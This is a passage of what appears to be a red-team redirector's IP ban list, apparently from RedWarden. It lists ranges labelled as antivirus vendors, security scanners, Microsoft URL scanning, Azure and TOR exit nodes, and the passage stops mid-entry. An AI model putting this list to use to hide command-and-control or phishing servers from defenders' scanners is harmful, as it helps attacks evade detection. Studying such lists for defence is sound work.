-75.54.229.204 -77.191.12.176 -77.191.19.135 -77.191.24.100 -77.234.40.0/24 # AVAST Software s.r.o.Czech Republic -77.234.41.0/24 # AVAST Software s.r.o.Czech Republic -77.234.42.0/24 # AVAST Software s.r.o.Czech Republic -77.234.43.0/24 # AVAST Software s.r.o.Czech Republic -77.234.44.0/24 # AVAST Software s.r.o.Czech Republic -77.234.45.0/24 # AVAST Software s.r.o.Czech Republic -77.234.46.0/24 # AVAST Software s.r.o.Czech Republic -77.234.47.0/24 # AVAST Software s.r.o.Czech Republic -77.246.163.141 -77.247.181.162 -77.250.227.12 -77.40.129.123 -77.74.176.0/24 # Kaspersky Lab AO -77.74.176.0/24 # Kaspersky Lab AORussian Federation -77.74.177.0/24 # Kaspersky Lab AORussian Federation -77.74.178.0/23 # Kaspersky Lab AORussian Federation -77.74.180.0/22 # Kaspersky Lab AORussian Federation -77.74.181.0/24 # Kaspersky Lab AORussian Federation -77.74.183.0/24 # Kaspersky Lab AORussian Federation -77.81.107.138 -77.81.247.72 -78.107.237.16 -78.109.23.1 -78.129.137.28 -78.13.203.226 -78.13.238.7 -78.142.175.70 -78.21.52.58 -78.31.164.41 -78.46.50.7 -78.70.167.74 -78.84.240.48 -79.125.0.0/16 -79.137.79.167 -79.137.80.94 -79.172.193.32 -79.199.245.10 -79.199.255.156 -79.78.147.142 -79.79.148.81 -80.209.252.72 -80.241.60.207 -80.67.172.162 -80.73.242.142 -80.79.23.7 -80.82.67.166 -80.82.67.186 -80.85.84.23 -81.161.59.0/24 # Bitdefender SRL -81.161.59.0/24 # Bitdefender SRLRomania -81.171.19.32 -82.146.58.35 -82.165.100.196 -82.165.142.79 -82.202.184.0/24 # Kaspersky Lab AORussian Federation -82.202.185.0/24 # Kaspersky Lab AORussian Federation -82.202.188.0/24 # Kaspersky Lab AORussian Federation -82.202.189.0/24 # Kaspersky Lab AORussian Federation -82.202.190.0/24 # Kaspersky Lab AO -82.202.190.0/24 # Kaspersky Lab AORussian Federation -82.221.112.122 -82.221.128.217 -82.221.139.190 -82.221.139.25 -82.223.27.82 -82.247.198.227 -8.25.203.0/24 # Zscaler -8.25.203.0/24 # ZSCALER -83.134.133.198 -8.34.0.0/16 -8.34.34.0/24 # Zscaler -8.34.34.0/24 # ZSCALER -8.35.0.0/16 -8.35.35.0/24 # Zscaler -8.35.35.0/24 # ZSCALER -83.92.47.99 -84.105.18.164 -84.17.21.50 -84.190.181.254 -84.19.181.25 -84.200.50.18 -84.200.82.163 -84.209.48.106 -84.217.13.138 -84.3.10.87 -84.33.17.128/25 -84.42.239.35 -84.42.239.36 -84.48.199.78 -84.53.192.243 -84.53.225.118 -85.115.32.0/24 # Forcepoint Cloud Turkey -85.115.33.0/24 # Forcepoint Cloud Netherlands -85.115.34.0/24 # Forcepoint UK Preproduction network -85.115.35.0/24 # Forcepoint Cloud Poland -85.115.36.0/24 # Forcepoint Cloud South Africa -85.115.37.0/24 # Forcepoint Cloud Sweden -85.115.39.0/24 # Forcepoint Cloud Milan MILA -85.115.41.0/24 # Forcepoint Cloud Americas -85.115.42.0/24 # Forcepoint Cloud Americas -85.115.44.0/24 # Forcepoint Cloud Spain -85.115.45.0/24 # Forcepoint Cloud Norway -85.115.46.0/24 # Forcepoint Cloud Dubai -85.115.47.0/24 # -85.115.49.0/24 # Forcepoint Cloud London LONL -85.115.52.0/24 # Forcepoint Cloud London LONA -85.115.53.0/24 # Forcepoint Cloud London LONB -85.115.54.0/24 # Forcepoint Cloud London LONJ -85.115.56.0/24 # Forcepoint Cloud Germany -85.115.58.0/24 # Forcepoint Cloud Germany -85.115.60.0/24 -85.115.60.0/24 # Forcepoint Cloud France -85.115.61.0/24 # Forcepoint Cloud Belgium -85.115.62.0/24 # Forcepoint Cloud Switzerland -85.115.63.0/24 # Forcepoint Cloud Finland -85.195.107.250 -85.248.227.163 -85.248.227.165 -85.90.244.23 -85.93.218.204 -86.111.216.0/24 -86.111.216.0/24 # Forcepoint Cloud Ltd -86.111.218.0/23 # Forcepoint Cloud Ltd -86.111.222.0/24 # -86.111.223.0/24 # Forcepoint Cloud Ltd -86.149.159.224 -86.149.159.8 -87.118.115.176 -87.118.116.12 -87.118.116.90 -87.118.122.201 -87.118.122.254 -87.118.122.30 -87.118.122.50 -87.118.123.191 -87.118.82.3 -87.118.92.43 -87.118.94.2 -87.120.254.130 -87.180.235.230 -87.180.238.160 -87.180.239.118 -87.238.0.0/16 -87.81.148.61 -87.98.178.61 -88.198.125.96 -88.76.29.216 -88.77.195.36 -88.77.211.4 -88.83.40.246 -89.144.12.15 -89.163.155.202 -89.167.131.0/24 # Zscaler -89.167.131.0/24 # Zscaler inc. -89.187.150.12 -89.187.150.13 -89.187.150.14 -89.187.150.15 -89.207.129.150 -89.212.99.66 -89.234.157.254 -89.236.34.117 -89.248.166.157 -89.31.57.5 -89.31.96.168 -89.34.237.226 -89.38.150.0/24 -89.38.208.57 -89.45.226.28 -91.103.64.0/21 # Kaspersky Lab AORussian Federation -91.117.98.197 -91.121.52.156 -91.122.52.9 -91.134.232.48 -91.138.253.244 -91.146.121.3 -91.199.104.0/24 -91.199.104.0/24 # Bitdefender SRLRomania -91.212.136.0/24 -91.213.143.0/24 # AVAST Software s.r.o. -91.213.143.0/24 # AVAST Software s.r.o.Czech Republic -91.219.236.232 -91.219.237.244 -91.220.42.0/24 -91.221.57.129 -91.228.164.0/24 # ESET, spol. s r.o. -91.228.164.0/24 # ESET, spol. s r.o.Slovakia -91.228.165.0/24 # ESET, spol. s r.o.Slovakia -91.228.166.0/24 # ESET, spol. s r.o.Slovakia -91.228.167.0/24 # ESET, spol. s r.o.Slovakia -91.233.106.121 -91.233.117.81 -91.244.10.34 -91.90.128.0/20 # Check Point Software Technologies LTD -91.90.128.0/20 # Check Point Software Technologies LTDIsrael -92.111.156.14 -92.169.87.4 -92.222.207.227 -92.222.6.12 -92.222.74.226 -92.63.173.28 -92.87.236.230 -93.115.95.201 -93.115.95.202 -93.115.95.204 -93.115.95.205 -93.115.95.206 -93.115.95.207 -93.123.73.123 -93.159.224.0/23 # Russian Federation -93.159.226.0/24 # Russian Federation -93.159.227.0/24 # -93.159.228.0/23 # Kaspersky Lab InternetRussian Federation -93.159.230.0/23 # Kaspersky Lab InternetRussian Federation -93.174.93.133 -93.174.93.71 -93.188.162.188 -93.64.207.55 -93.88.74.140 -94.102.50.42 -94.130.28.151 -94.142.242.84 -94.156.77.83 -94.177.123.116 -94.198.100.17 -94.23.201.80 -94.23.239.44 -94.242.205.2 -94.242.57.161 -94.242.57.2 -94.245.0.0/16 -94.248.3.184 -94.248.36.241 -94.248.40.132 -94.34.7.140 -95.128.43.164 -95.130.11.170 -95.130.12.12 -95.130.9.210 -95.183.244.0/24 -95.211.118.194 -95.211.230.94 -95.215.44.194 -95.249.94.233 -95.45.252.0/29 -95.79.145.72 -96.127.0.0/16 -96.255.14.191 -96.45.32.0/20 -96.45.32.0/20 # Fortinet Inc. -96.45.32.0/21 -96.45.32.0/21 # Fortinet Inc. -96.45.33.0/24 # Fortinet Inc. -96.45.40.0/21 -96.45.40.0/21 # Fortinet Inc. -96.64.149.101 -97.74.237.196 -98.158.240.0/20 # Symantec Corporation -98.159.38.0/24 # Avast Software -98.174.90.43 -99.79.0.0/16 -99.80.0.0/16 -99.82.0.0/16 -99.84.0.0/16 -99.86.0.0/16 - -73.217.131.0/24 # Custom -102.37.0.0/16 # Custom - -23.103.132.0/22 # Microsoft URL Scanning -23.103.136.0/21 # Microsoft URL Scanning -23.103.144.0/20 # Microsoft URL Scanning -23.103.198.0/23 # Microsoft URL Scanning -23.103.200.0/22 # Microsoft URL Scanning -40.92.0.0/14 # Microsoft URL Scanning -40.107.0.0/17 # Microsoft URL Scanning -52.100.0.0/14 # Microsoft URL Scanning -52.238.78.88/32 # Microsoft URL Scanning -65.55.88.0/24 # Microsoft URL Scanning -65.55.169.0/24 # Microsoft URL Scanning -94.245.120.64/26 # Microsoft URL Scanning -104.47.0.0/17 # Microsoft URL Scanning -157.55.234.0/24 # Microsoft URL Scanning -157.56.110.0/23 # Microsoft URL Scanning -157.56.112.0/24 # Microsoft URL Scanning -207.46.100.0/24 # Microsoft URL Scanning -207.46.163.0/24 # Microsoft URL Scanning -213.199.154.0/24 # Microsoft URL Scanning -213.199.180.128/26 # Microsoft URL Scanning -216.32.180.0/23 # Microsoft URL Scanning - -208.87.232.0/21 # ForcePoint -157.167.1.0/24 # ForcePoint -157.167.2.0/24 # ForcePoint -204.15.64.0/23 # ForcePoint -204.15.66.0/24 # ForcePoint -204.15.67.0/24 # ForcePoint -204.15.68.0/24 # ForcePoint -204.15.69.0/24 # ForcePoint -208.80.192.0/21 # ForcePoint -208.80.198.0/24 # ForcePoint -208.80.199.0/24 # ForcePoint -86.111.218.0/23 # ForcePoint -86.111.220.0/23 # ForcePoint - -161.69.0.0/16 # McAfee -161.69.24.0/21 # McAfee -161.69.112.0/24 # McAfee - -165.255.0.0/17 # ZScaler - -195.189.155.0/24 # MiscContributions:@ztgrace -91.199.104.0/24 # MiscContributions:@ztgrace -91.212.136.0/24 # MiscContributions:@ztgrace -208.90.236.0/22 # MiscContributions:@ztgrace -204.13.200.0/22 # MiscContributions:@ztgrace -207.102.138.0/24 # MiscContributions:@ztgrace -208.87.232.0/21 # MiscContributions:@ztgrace -103.245.47.20 # MiscContributions:@ztgrace -182.75.165.176/30 # MiscContributions:@ztgrace - -# -# Disabled. More context here: -# https://github.com/mgeeky/RedWarden/issues/10#issuecomment-941690930 -# and here: -# https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10#gistcomment-3734057 -# -# 173.94.0.0/16 # OtherVThosts -# 8.34.0.0/16 # OtherVThosts -# 8.35.0.0/16 # OtherVThosts - -150.70.0.0/22 # TrendMicro -150.70.104.0/22 # TrendMicro -150.70.110.0/24 # TrendMicro -150.70.112.0/20 # TrendMicro -150.70.12.0/22 # TrendMicro -150.70.160.0/20 # TrendMicro -150.70.176.0/20 # TrendMicro -150.70.192.0/21 # TrendMicro -150.70.224.0/20 # TrendMicro -150.70.240.0/20 # TrendMicro -150.70.31.0/24 # TrendMicro -150.70.4.0/22 # TrendMicro -150.70.64.0/18 # TrendMicro -150.70.64.0/20 # TrendMicro -150.70.8.0/22 # TrendMicro -150.70.80.0/20 # TrendMicro -150.70.96.0/20 # TrendMicro -206.165.76.0/24 # TrendMicro - -154.59.123.0/24 # PaloAlto -154.59.126.0/24 # PaloAlto -199.167.52.0/24 # PaloAlto -199.167.53.0/24 # PaloAlto -199.167.55.0/24 # PaloAlto -202.126.13.0/24 # PaloAlto -202.189.133.0/24 # PaloAlto -208.184.7.0/24 # PaloAlto -64.74.215.0/24 # PaloAlto -70.42.131.0/24 # PaloAlto -72.5.231.0/24 # PaloAlto -72.5.65.0/24 # PaloAlto -74.201.127.0/24 # PaloAlto -74.217.90.0/24 # PaloAlto - -148.163.148.0/22 # ProofPoint -148.163.156.0/23 # ProofPoint -208.84.65.0/24 # ProofPoint -208.84.66.0/24 # ProofPoint -208.86.202.0/24 # ProofPoint -208.86.203.0/24 # ProofPoint -67.231.144.0/24 # ProofPoint -67.231.145.0/24 # ProofPoint -67.231.146.0/24 # ProofPoint -67.231.147.0/24 # ProofPoint -67.231.148.0/24 # ProofPoint -67.231.149.0/24 # ProofPoint -67.231.151.0/24 # ProofPoint -67.231.158.0/24 # ProofPoint - -173.243.128.0/20 # Fortigate -173.243.136.0/21 # Fortigate -208.91.112.0/22 # Fortigate -208.91.112.0/23 # Fortigate -208.91.114.0/23 # Fortigate -23.249.49.0/24 # Fortigate -23.249.50.0/24 # Fortigate -23.249.51.0/24 # Fortigate -23.249.52.0/24 # Fortigate -23.249.53.0/24 # Fortigate -23.249.54.0/24 # Fortigate -23.249.55.0/24 # Fortigate -96.45.32.0/20 # Fortigate -96.45.32.0/21 # Fortigate -96.45.40.0/21 # Fortigate - -143.127.10.0/23 # Symantec -143.127.100.0/24 # Symantec -143.127.102.0/24 # Symantec -143.127.103.0/24 # Symantec -143.127.119.0/24 # Symantec -143.127.136.0/24 # Symantec -143.127.138.0/24 # Symantec -143.127.139.0/24 # Symantec -143.127.14.0/23 # Symantec -143.127.2.0/24 # Symantec -143.127.241.0/24 # Symantec -143.127.242.0/23 # Symantec -143.127.87.0/24 # Symantec -143.127.89.0/24 # Symantec -143.127.93.0/24 # Symantec -155.64.105.0/24 # Symantec -155.64.138.0/24 # Symantec -155.64.16.0/23 # Symantec -155.64.23.0/24 # Symantec -155.64.38.0/24 # Symantec -155.64.40.0/24 # Symantec -155.64.49.0/24 # Symantec -155.64.56.0/24 # Symantec -155.64.63.0/24 # Symantec -166.98.152.0/23 # Symantec -166.98.242.0/23 # Symantec -166.98.38.0/24 # Symantec -166.98.67.0/24 # Symantec -166.98.71.0/24 # Symantec -198.6.32.0/20 # Symantec -198.6.32.0/24 # Symantec -198.6.34.0/24 # Symantec -198.6.62.0/24 # Symantec -216.10.192.0/20 # Symantec -216.10.193.0/24 # Symantec - -104.40.0.0/13 # Microsoft - -104.208.0.0/16 # Azure -104.209.0.0/16 # Azure -104.210.0.0/16 # Azure -104.211.0.0/16 # Azure -104.214.0.0/16 # Azure -104.215.0.0/16 # Azure -104.40.0.0/16 # Azure -104.41.0.0/16 # Azure -104.42.0.0/16 # Azure -104.43.0.0/16 # Azure -104.44.0.0/16 # Azure -104.45.0.0/16 # Azure -104.46.0.0/16 # Azure -104.47.0.0/16 # Azure -111.221.0.0/16 # Azure -131.253.0.0/16 # Azure -134.170.0.0/16 # Azure -137.116.0.0/16 # Azure -137.117.0.0/16 # Azure -137.135.0.0/16 # Azure -138.91.0.0/16 # Azure -157.55.0.0/16 # Azure -157.56.0.0/16 # Azure -168.61.0.0/16 # Azure -168.62.0.0/16 # Azure -168.63.0.0/16 # Azure -191.232.0.0/16 # Azure -191.233.0.0/16 # Azure -191.234.0.0/16 # Azure -191.235.0.0/16 # Azure -191.236.0.0/16 # Azure -191.237.0.0/16 # Azure -191.238.0.0/16 # Azure -191.239.0.0/16 # Azure -193.149.0.0/16 # Azure -199.30.0.0/16 # Azure -20.184.0.0/16 # Azure -20.185.0.0/16 # Azure -20.186.0.0/16 # Azure -20.187.0.0/16 # Azure -20.188.0.0/16 # Azure -20.189.0.0/16 # Azure -20.190.0.0/16 # Azure -20.191.0.0/16 # Azure -20.36.0.0/16 # Azure -20.37.0.0/16 # Azure -20.38.0.0/16 # Azure -20.39.0.0/16 # Azure -20.40.0.0/16 # Azure -20.41.0.0/16 # Azure -20.42.0.0/16 # Azure -20.43.0.0/16 # Azure -20.44.0.0/16 # Azure -204.231.0.0/16 # Azure -207.46.0.0/16 # Azure -207.68.0.0/16 # Azure -209.240.0.0/16 # Azure -213.199.0.0/16 # Azure -23.100.0.0/16 # Azure -23.101.0.0/16 # Azure -23.102.0.0/16 # Azure -23.103.0.0/16 # Azure -23.96.0.0/16 # Azure -23.97.0.0/16 # Azure -23.98.0.0/16 # Azure -23.99.0.0/16 # Azure -40.112.0.0/16 # Azure -40.113.0.0/16 # Azure -40.114.0.0/16 # Azure -40.115.0.0/16 # Azure -40.116.0.0/16 # Azure -40.117.0.0/16 # Azure -40.118.0.0/16 # Azure -40.119.0.0/16 # Azure -40.121.0.0/16 # Azure -40.122.0.0/16 # Azure -40.123.0.0/16 # Azure -40.124.0.0/16 # Azure -40.125.0.0/16 # Azure -40.126.0.0/16 # Azure -40.127.0.0/16 # Azure -40.64.0.0/16 # Azure -40.65.0.0/16 # Azure -40.66.0.0/16 # Azure -40.67.0.0/16 # Azure -40.68.0.0/16 # Azure -40.69.0.0/16 # Azure -40.70.0.0/16 # Azure -40.71.0.0/16 # Azure -40.74.0.0/16 # Azure -40.75.0.0/16 # Azure -40.76.0.0/16 # Azure -40.77.0.0/16 # Azure -40.78.0.0/16 # Azure -40.79.0.0/16 # Azure -40.80.0.0/16 # Azure -40.81.0.0/16 # Azure -40.82.0.0/16 # Azure -40.83.0.0/16 # Azure -40.84.0.0/16 # Azure -40.85.0.0/16 # Azure -40.86.0.0/16 # Azure -40.87.0.0/16 # Azure -40.88.0.0/16 # Azure -40.89.0.0/16 # Azure -40.90.0.0/16 # Azure -40.91.0.0/16 # Azure -51.104.0.0/16 # Azure -51.105.0.0/16 # Azure -51.136.0.0/16 # Azure -51.137.0.0/16 # Azure -51.140.0.0/16 # Azure -51.141.0.0/16 # Azure -51.142.0.0/16 # Azure -51.143.0.0/16 # Azure -51.144.0.0/16 # Azure -51.145.0.0/16 # Azure -64.4.0.0/16 # Azure -65.52.0.0/16 # Azure -65.54.0.0/16 # Azure -65.55.0.0/16 # Azure -70.37.0.0/16 # Azure -94.245.0.0/16 # Azure - -64.235.144.0/24 # Barracuda - -103.10.197.50 # TOR Exit Nodes -103.16.16.107 # TOR Exit Nodes -103.234.220.197 # TOR Exit Nodes -103.236.201.110 # TOR Exit Nodes -103.236.201.57 # TOR Exit Nodes -103.27.124.82 # TOR Exit Nodes -103.29.70.23 # TOR Exit Nodes -103.3.61.114 # TOR Exit Nodes -103.35.74.75 # TOR Exit Nodes -103.35.74.77 # TOR Exit Nodes -103.56.207.84 # TOR Exit Nodes -103.8.79.229 # TOR Exit Nodes -104.132.0.72 # TOR Exit Nodes -104.192.0.58 # TOR Exit Nodes -104.200.20.46 # TOR Exit Nodes -104.208.158.116 # TOR Exit Nodes -104.218.63.73 # TOR Exit Nodes -104.218.63.74 # TOR Exit Nodes -104.218.63.75 # TOR Exit Nodes -104.218.63.76 # TOR Exit Nodes -104.223.123.98 # TOR Exit Nodes -104.236.141.156 # TOR Exit Nodes -104.244.72.200 # TOR Exit Nodes -104.244.74.78 # TOR Exit Nodes -106.187.37.101 # TOR Exit Nodes -107.181.174.84 # TOR Exit Nodes -109.126.9.228 # TOR Exit Nodes -109.169.33.163 # TOR Exit Nodes -109.190.182.44 # TOR Exit Nodes -109.201.133.100 # TOR Exit Nodes -109.69.67.17 # TOR Exit Nodes -111.248.62.31 # TOR Exit Nodes -115.70.208.19 # TOR Exit Nodes -118.163.74.160 # TOR Exit Nodes -120.29.217.46 # TOR Exit Nodes -124.109.1.207 # TOR Exit Nodes -125.212.241.182 # TOR Exit Nodes -126.72.58.19 # TOR Exit Nodes -128.199.47.160 # TOR Exit Nodes -128.199.76.145 # TOR Exit Nodes -128.52.128.105 # TOR Exit Nodes -13.79.231.167 # TOR Exit Nodes -130.204.161.3 # TOR Exit Nodes -133.218.180.149 # TOR Exit Nodes -137.74.167.96 # TOR Exit Nodes -137.74.169.241 # TOR Exit Nodes -137.74.73.179 # TOR Exit Nodes -138.197.167.60 # TOR Exit Nodes -138.197.207.243 # TOR Exit Nodes -138.197.85.80 # TOR Exit Nodes -139.162.10.72 # TOR Exit Nodes -139.162.105.26 # TOR Exit Nodes -139.162.124.207 # TOR Exit Nodes -139.162.16.13 # TOR Exit Nodes -139.162.226.245 # TOR Exit Nodes -139.162.28.23 # TOR Exit Nodes -139.162.28.31 # TOR Exit Nodes -139.59.213.165 # TOR Exit Nodes -139.59.62.94 # TOR Exit Nodes -14.202.230.49 # TOR Exit Nodes -141.170.2.53 # TOR Exit Nodes -141.255.189.161 # TOR Exit Nodes -142.4.211.161 # TOR Exit Nodes -142.44.166.241 # TOR Exit Nodes -144.217.161.119 # TOR Exit Nodes -144.217.167.240 # TOR Exit Nodes -144.217.174.248 # TOR Exit Nodes -144.217.240.34 # TOR Exit Nodes -144.217.94.195 # TOR Exit Nodes -144.217.94.96 # TOR Exit Nodes -145.220.75.103 # TOR Exit Nodes -145.239.29.201 # TOR Exit Nodes -145.239.74.47 # TOR Exit Nodes -145.239.82.79 # TOR Exit Nodes -145.239.91.37 # TOR Exit Nodes -146.185.177.103 # TOR Exit Nodes -147.135.156.122 # TOR Exit Nodes -149.202.185.34 # TOR Exit Nodes -149.56.201.79 # TOR Exit Nodes -149.56.223.241 # TOR Exit Nodes -151.80.238.152 # TOR Exit Nodes -154.127.60.92 # TOR Exit Nodes -154.16.149.35 # TOR Exit Nodes -154.16.149.74 # TOR Exit Nodes -155.133.64.203 # TOR Exit Nodes -155.4.230.97 # TOR Exit Nodes -155.4.250.85 # TOR Exit Nodes -156.67.106.251 # TOR Exit Nodes -156.67.106.30 # TOR Exit Nodes -156.67.106.32 # TOR Exit Nodes -158.255.6.242 # TOR Exit Nodes -158.255.7.61 # TOR Exit Nodes -158.69.215.7 # TOR Exit Nodes -158.69.83.25 # TOR Exit Nodes -161.184.238.220 # TOR Exit Nodes -162.219.176.26 # TOR Exit Nodes -162.220.246.230 # TOR Exit Nodes -162.221.201.57 # TOR Exit Nodes -162.243.166.137 # TOR Exit Nodes -162.243.75.204 # TOR Exit Nodes -162.247.72.199 # TOR Exit Nodes -162.247.72.200 # TOR Exit Nodes -162.247.72.201 # TOR Exit Nodes -162.247.72.202 # TOR Exit Nodes -162.247.72.213 # TOR Exit Nodes -162.247.72.216 # TOR Exit Nodes -162.247.72.217 # TOR Exit Nodes -162.247.72.27 # TOR Exit Nodes -162.247.72.7 # TOR Exit Nodes -162.247.73.204 # TOR Exit Nodes -162.247.73.206 # TOR Exit Nodes -163.172.101.137 # TOR Exit Nodes -163.172.136.101 # TOR Exit Nodes -163.172.137.174 # TOR Exit Nodes -163.172.137.222 # TOR Exit Nodes -163.172.138.11 # TOR Exit Nodes -163.172.139.161 # TOR Exit Nodes -163.172.140.123 # TOR Exit Nodes -163.172.151.250 # TOR Exit Nodes -163.172.151.47 # TOR Exit Nodes -163.172.160.182 # TOR Exit Nodes -163.172.162.106 # TOR Exit Nodes -163.172.163.85 # TOR Exit Nodes -163.172.171.163 # TOR Exit Nodes -163.172.179.129 # TOR Exit Nodes -163.172.212.115 # TOR Exit Nodes -163.172.217.50 # TOR Exit Nodes -163.172.223.200 # TOR Exit Nodes -163.172.223.87 # TOR Exit Nodes -164.132.106.162 # TOR Exit Nodes -164.132.41.140 # TOR Exit Nodes -164.132.51.91 # TOR Exit Nodes -164.77.133.220 # TOR Exit Nodes -165.227.200.152 # TOR Exit Nodes -165.227.58.177 # TOR Exit Nodes -165.255.186.248 # TOR Exit Nodes -165.255.224.117 # TOR Exit Nodes -166.70.15.14 # TOR Exit Nodes -166.70.207.2 # TOR Exit Nodes -167.114.251.167 # TOR Exit Nodes -167.114.34.150 # TOR Exit Nodes -169.239.183.210 # TOR Exit Nodes -170.250.140.52 # TOR Exit Nodes -171.25.193.20 # TOR Exit Nodes -171.25.193.235 # TOR Exit Nodes -171.25.193.25 # TOR Exit Nodes -171.25.193.77 # TOR Exit Nodes -171.25.193.78 # TOR Exit Nodes -172.104.148.28 # TOR Exit Nodes -172.104.187.79 # TOR Exit Nodes -172.93.48.163 # TOR Exit Nodes -172.98.193.43 # TOR Exit Nodes -173.14.173.227 # TOR Exit Nodes -173.208.153.75 # TOR Exit Nodes -173.249.2.79 # TOR Exit Nodes -173.254.216.66 # TOR Exit Nodes -173.255.226.142 # TOR Exit Nodes -173.255.231.125 # TOR Exit Nodes -173.255.253.173 # TOR Exit Nodes -176.10.104.240 # TOR Exit Nodes -176.10.104.243 # TOR Exit Nodes -176.10.107.180 # TOR Exit Nodes -176.121.10.52 # TOR Exit Nodes -176.126.252.11 # TOR Exit Nodes -176.126.252.12 # TOR Exit Nodes -176.223.113.26 # TOR Exit Nodes -176.31.180.157 # TOR Exit Nodes -176.31.45.3 # TOR Exit Nodes -176.36.117.185 # TOR Exit Nodes -176.38.163.77 # TOR Exit Nodes -176.58.100.98 # TOR Exit Nodes -176.58.89.182 # TOR Exit Nodes -177.133.182.77 # TOR Exit Nodes -177.157.253.157 # TOR Exit Nodes -178.17.170.13 # TOR Exit Nodes -178.17.170.135 # TOR Exit Nodes -178.17.170.149 # TOR Exit Nodes -178.17.170.156 # TOR Exit Nodes -178.17.170.164 # TOR Exit Nodes -178.17.170.194 # TOR Exit Nodes -178.17.170.195 # TOR Exit Nodes -178.17.170.196 # TOR Exit Nodes -178.17.171.111 # TOR Exit Nodes -178.17.171.49 # TOR Exit Nodes -178.17.174.10 # TOR Exit Nodes -178.17.174.14 # TOR Exit Nodes -178.17.174.198 # TOR Exit Nodes -178.175.131.194 # TOR Exit Nodes -178.18.83.215 # TOR Exit Nodes -178.20.55.16 # TOR Exit Nodes -178.20.55.18 # TOR Exit Nodes -178.202.169.177 # TOR Exit Nodes -178.209.42.84 # TOR Exit Nodes -178.238.237.44 # TOR Exit Nodes -178.32.181.97 # TOR Exit Nodes -178.32.181.98 # TOR Exit Nodes -178.32.181.99 # TOR Exit Nodes -18.248.1.85 # TOR Exit Nodes -18.248.2.85 # TOR Exit Nodes -18.85.22.204 # TOR Exit Nodes -185.10.68.119 # TOR Exit Nodes -185.10.68.139 # TOR Exit Nodes -185.10.68.191 # TOR Exit Nodes -185.100.84.108 # TOR Exit Nodes -185.100.84.82 # TOR Exit Nodes -185.100.85.101 # TOR Exit Nodes -185.100.85.112 # TOR Exit Nodes -185.100.85.147 # TOR Exit Nodes -185.100.85.190 # TOR Exit Nodes -185.100.85.191 # TOR Exit Nodes -185.100.85.192 # TOR Exit Nodes -185.100.85.61 # TOR Exit Nodes -185.100.86.100 # TOR Exit Nodes -185.100.86.141 # TOR Exit Nodes -185.100.86.154 # TOR Exit Nodes -185.100.86.167 # TOR Exit Nodes -185.100.86.199 # TOR Exit Nodes -185.100.86.217 # TOR Exit Nodes -185.100.86.69 # TOR Exit Nodes -185.100.86.86 # TOR Exit Nodes -185.100.87.206 # TOR Exit Nodes -185.100.87.207 # TOR Exit Nodes -185.100.87.82 # TOR Exit Nodes -185.103.99.60 # TOR Exit Nodes -185.104.120.2 # TOR Exit Nodes -185.104.120.3 # TOR Exit Nodes -185.104.120.4 # TOR Exit Nodes -185.104.120.7 # TOR Exit Nodes -185.107.81.233 # TOR Exit Nodes -185.107.81.234 # TOR Exit Nodes -185.11.167.4 # TOR Exit Nodes -185.112.157.135 # TOR Exit Nodes -185.112.254.195 # TOR Exit Nodes -185.117.215.9 # TOR Exit Nodes -185.127.25.68 # TOR Exit Nodes -185.129.62.62 # TOR Exit Nodes -185.157.232.64 # TOR Exit Nodes -185.159.128.193 # TOR Exit Nodes -185.16.200.176 # TOR Exit Nodes -185.163.1.11 # TOR Exit Nodes -185.165.168.229 # TOR Exit Nodes -185.165.168.42 # TOR Exit Nodes -185.165.168.77 # TOR Exit Nodes -185.165.169.23 # TOR Exit Nodes -185.169.235.5 # TOR Exit Nodes -185.170.42.18 # TOR Exit Nodes -185.177.59.206 # TOR Exit Nodes -185.186.77.27 # TOR Exit Nodes -185.189.14.230 # TOR Exit Nodes -185.189.14.61 # TOR Exit Nodes -185.203.240.111 # TOR Exit Nodes -185.203.241.120 # TOR Exit Nodes -185.203.242.105 # TOR Exit Nodes -185.209.20.165 # TOR Exit Nodes -185.209.20.209 # TOR Exit Nodes -185.209.21.47 # TOR Exit Nodes -185.219.82.241 # TOR Exit Nodes -185.219.82.242 # TOR Exit Nodes -185.219.82.243 # TOR Exit Nodes -185.31.172.234 # TOR Exit Nodes -185.34.33.2 # TOR Exit Nodes -185.38.14.171 # TOR Exit Nodes -185.38.14.215 # TOR Exit Nodes -185.61.138.207 # TOR Exit Nodes -185.61.149.193 # TOR Exit Nodes -185.62.57.91 # TOR Exit Nodes -185.65.205.10 # TOR Exit Nodes -185.66.200.10 # TOR Exit Nodes -185.70.11.132 # TOR Exit Nodes -185.72.244.24 # TOR Exit Nodes -185.82.216.233 # TOR Exit Nodes -185.82.217.51 # TOR Exit Nodes -185.82.217.70 # TOR Exit Nodes -185.86.149.175 # TOR Exit Nodes -185.87.111.113 # TOR Exit Nodes -185.87.185.45 # TOR Exit Nodes -186.120.225.119 # TOR Exit Nodes -187.20.55.95 # TOR Exit Nodes -188.116.11.181 # TOR Exit Nodes -188.143.42.27 # TOR Exit Nodes -188.166.127.251 # TOR Exit Nodes -188.214.104.146 # TOR Exit Nodes -188.235.14.159 # TOR Exit Nodes -188.235.37.42 # TOR Exit Nodes -189.207.179.80 # TOR Exit Nodes -189.84.21.44 # TOR Exit Nodes -190.10.8.50 # TOR Exit Nodes -190.210.98.90 # TOR Exit Nodes -191.34.129.22 # TOR Exit Nodes -191.96.249.110 # TOR Exit Nodes -192.150.187.46 # TOR Exit Nodes -192.160.102.164 # TOR Exit Nodes -192.160.102.165 # TOR Exit Nodes -192.160.102.166 # TOR Exit Nodes -192.160.102.168 # TOR Exit Nodes -192.160.102.169 # TOR Exit Nodes -192.160.102.170 # TOR Exit Nodes -192.195.80.10 # TOR Exit Nodes -192.241.79.178 # TOR Exit Nodes -192.243.113.200 # TOR Exit Nodes -192.34.80.176 # TOR Exit Nodes -192.36.27.4 # TOR Exit Nodes -192.36.27.6 # TOR Exit Nodes -192.36.27.7 # TOR Exit Nodes -192.42.115.102 # TOR Exit Nodes -192.42.116.16 # TOR Exit Nodes -192.81.131.49 # TOR Exit Nodes -193.107.85.56 # TOR Exit Nodes -193.107.85.57 # TOR Exit Nodes -193.110.157.151 # TOR Exit Nodes -193.15.16.4 # TOR Exit Nodes -193.164.131.95 # TOR Exit Nodes -193.171.202.150 # TOR Exit Nodes -193.201.225.45 # TOR Exit Nodes -193.233.60.154 # TOR Exit Nodes -193.70.39.41 # TOR Exit Nodes -193.90.12.115 # TOR Exit Nodes -193.90.12.116 # TOR Exit Nodes -193.90.12.117 # TOR Exit Nodes -193.90.12.118 # TOR Exit Nodes -193.90.12.119 # TOR Exit Nodes -194.218.3.79 # TOR Exit Nodes -194.54.162.212 # TOR Exit Nodes -194.88.143.66 # TOR Exit Nodes -195.219.163.68 # TOR Exit Nodes -195.219.166.53 # TOR Exit Nodes -195.22.126.177 # TOR Exit 